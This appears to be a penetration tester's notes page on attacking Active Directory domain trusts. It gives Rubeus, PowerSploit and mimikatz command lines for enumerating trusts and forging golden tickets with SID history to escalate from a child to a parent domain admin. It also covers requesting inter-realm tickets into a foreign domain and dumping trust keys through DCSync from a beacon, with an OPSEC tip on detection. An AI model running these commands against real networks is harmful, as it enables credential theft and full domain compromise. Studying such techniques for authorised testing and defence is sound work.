In Active Directory, a trust allows users in one domain to access resources in other domains.

Enumeration

Enumerate the trusts for the current subdomain (use -Domain [fqdn] to enumerate other domains, e.g. parent):

# PowerSploit
# SourceName domain trusts TargetName domain
Get-DomainTrust

Trust Traits

  • Direction: A trust can be one-way or two-way. In a one-way trust, domain A trust domain B, meaning that users in B can access resources in A. In this case, A has an outbound trust, and B has an inbound trust. A two-way trust (a.k.a. bidirectional trust) can be seen as two one-way trust in opposite directions.
  • Transitivity: If the trust is transitive, then it can be chained with other trusts. For examples, if A transitive-trusts B and B transitive-trusts C, then A trusts C, and users in C can access resources in A.

Parent-child Two-way Trusts

Parent and children domains have two-way transitive trusts between them.

# PowerSploit
# SourceName domain trusts TargetName domain
Get-DomainTrust

A child domain admin can be elevated to parent domain admin by adding fake SID history to a golden ticket (originally intended for migrating users to other domains by recording old SIDs in the other domain):

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:[krbtgt-hash-b64] /user:Administrator /domain:[child-domain-fqdn] /sid:[child-domain-sid] /sids:[parent-domain-admins-group-sid] /nowrap

Import the ticket to access parent DC.

The same trick (/sids: for group SID history) applies to diamond ticket. Specify 500 (Administrator) for ticket user RID and 519 for group RID.

Other ideas for exploiting trusts without domain admin:

  • Kerberoast or AS-REP roasting across trusts.
  • Capture TGTs from parent domain principals trying to unconstrained-delegate to compromised child domain machines.
  • Impersonate RDP session from parent domain.

One-way trusts

Inbound

Attack Overview

  • Goal: obtain access to foreign domain
  • Requirements: existing inbound trust

First find the trusting foreign domain with Get-DomainTrust.

To actually exploit the trust, we must find a group in the foreign domain containing members from the current domain:

# PowerSploit
Get-DomainForeignGroupMember -Domain [foreign-domain]
ConvertFrom-SID [member-name-sid]

After compromising a member of such group (and assuming the group has admin privileges in foreign domain), we can exploit the trust and gain access to foreign domain DC.

OPSEC note

All inter-realm tickets use rc4_hmac by default regardless of the original TGT encryption algorithm, so do not be alarmed when you see rc4.

# Get TGT
Rubeus.exe asktgt /user:[target-user] /domain:[current-domain] /aes256:[hash] /nowrap
# Request inter-realm ticket
Rubeus.exe asktgs /service:krbtgt/[foreign-domain-fqdn] /domain:[current-domain-fqdn] /dc:[current-domain-dc-fqdn] /ticket:[tgt-base64] /nowrap
# Obtain CIFS TGS with the inter-realm ticket
Rubeus.exe asktgs /service:cifs/[foreign-domain-dc-fqdn] /domain:[current-domain-fqdn] /dc:[foreign-domain-dc-fqdn] /ticket:[inter-realm-base64] /nowrap

Outbound

Outbound trusts can still be exploited to gain regular user access on the trusted domain by getting the shared credentials. The shared credentials can be used to access an account (named as TrustingDomainName$) on the trusted domain.

Two methods may be used to the the shared credential:

Method 1: memory patching (risky)

beacon> mimikatz lsadump::trust

Method 2: DCsync

# Get the GUID of TDO (trusted domain object)
beacon> powershell Get-DomainObject -Identity "CN=[foreign-domain-fqdn],CN=System,[DC=[current-domain-fqdn]...]" | select objectGuid
# Get shared keys from GUID
# [Out] = latest keys
# [Out-n] = n-th key history
beacon> mimikatz @lsadump::dcsync /domain:[current-domain-fqdn] /guid:{[tdo-guid]}

With the key, we can obtain TGT for TrustingDomainName$ on the trusted domain. As usual, RC4 is used by default for inter-realm tickets.

Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:[key-base64] /nowrap

Although no additional privilege is obtained with this attack, it does open up a lot more attack opportunities.